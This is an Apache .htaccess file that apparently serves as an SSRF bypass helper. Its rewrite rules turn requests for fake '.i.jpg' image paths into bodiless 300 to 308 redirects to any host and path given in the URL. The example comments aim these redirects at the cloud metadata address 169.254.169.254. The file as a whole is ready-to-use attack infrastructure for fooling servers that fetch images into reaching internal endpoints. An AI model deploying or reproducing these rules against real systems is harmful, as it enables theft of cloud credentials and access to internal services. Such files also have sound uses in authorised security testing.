# Set blank response body
ErrorDocument 300 " "
ErrorDocument 301 " "
ErrorDocument 302 " "
ErrorDocument 303 " "
ErrorDocument 305 " "
ErrorDocument 307 " "
ErrorDocument 308 " "

# 300 without response body
# https://ssrf.localdomain.pw/img-without-body/300-http-169.254.169.254:80-.i.jpg
# https://ssrf.localdomain.pw/img-without-body/300-http-169.254.169.254:80-test/.i.jpg
RewriteEngine on
RewriteCond %{REQUEST_URI} 300-([^/-]*)-([^/-]*)-(.*).i.jpg$
RewriteRule 300-([^/-]*)-([^/-]*)-(.*).i.jpg$ $1://$2/$3 [L,R=300,NC]

# 301 without response body
# https://ssrf.localdomain.pw/img-without-body/301-http-169.254.169.254:80-.i.jpg
# https://ssrf.localdomain.pw/img-without-body/301-http-169.254.169.254:80-test/.i.jpg
RewriteEngine on
RewriteCond %{REQUEST_URI} 301-([^/-]*)-([^/-]*)-(.*).i.jpg$
RewriteRule 301-([^/-]*)-([^/-]*)-(.*).i.jpg$ $1://$2/$3 [L,R=301,NC]

# 302 without response body
# https://ssrf.localdomain.pw/img-without-body/302-http-169.254.169.254:80-.i.jpg
# https://ssrf.localdomain.pw/img-without-body/302-http-169.254.169.254:80-test/.i.jpg
RewriteEngine on
RewriteCond %{REQUEST_URI} 302-([^/-]*)-([^/-]*)-(.*).i.jpg$
RewriteRule 302-([^/-]*)-([^/-]*)-(.*).i.jpg$ $1://$2/$3 [L,R=302,NC]

# 303 without response body
# https://ssrf.localdomain.pw/img-without-body/303-http-169.254.169.254:80-.i.jpg
# https://ssrf.localdomain.pw/img-without-body/303-http-169.254.169.254:80-test/.i.jpg
RewriteEngine on
RewriteCond %{REQUEST_URI} 303-([^/-]*)-([^/-]*)-(.*).i.jpg$
RewriteRule 303-([^/-]*)-([^/-]*)-(.*).i.jpg$ $1://$2/$3 [L,R=303,NC]

# 305 without response body
# https://ssrf.localdomain.pw/img-without-body/305-http-169.254.169.254:80-.i.jpg
# https://ssrf.localdomain.pw/img-without-body/305-http-169.254.169.254:80-test/.i.jpg
RewriteEngine on
RewriteCond %{REQUEST_URI} 305-([^/-]*)-([^/-]*)-(.*).i.jpg$
RewriteRule 305-([^/-]*)-([^/-]*)-(.*).i.jpg$ $1://$2/$3 [L,R=305,NC]

# 307 without response body
# https://ssrf.localdomain.pw/img-without-body/307-http-169.254.169.254:80-.i.jpg
# https://ssrf.localdomain.pw/img-without-body/307-http-169.254.169.254:80-test/.i.jpg
RewriteEngine on
RewriteCond %{REQUEST_URI} 307-([^/-]*)-([^/-]*)-(.*).i.jpg$
RewriteRule 307-([^/-]*)-([^/-]*)-(.*).i.jpg$ $1://$2/$3 [L,R=307,NC]

# 308 without response body
# https://ssrf.localdomain.pw/img-without-body/308-http-169.254.169.254:80-.i.jpg
# https://ssrf.localdomain.pw/img-without-body/308-http-169.254.169.254:80-test/.i.jpg
RewriteEngine on
RewriteCond %{REQUEST_URI} 308-([^/-]*)-([^/-]*)-(.*).i.jpg$
RewriteRule 308-([^/-]*)-([^/-]*)-(.*).i.jpg$ $1://$2/$3 [L,R=308,NC]

# Always set the Content-Type header text/html
Header always set Content-Type text/html
# Always set Cache-Control to max-age=0, must-revalidate, no-cache, no-store, private
Header always set Cache-Control "max-age=0, must-revalidate, no-cache, no-store, private"
# Always set Pragma to no-cache
Header always set Pragma no-cache
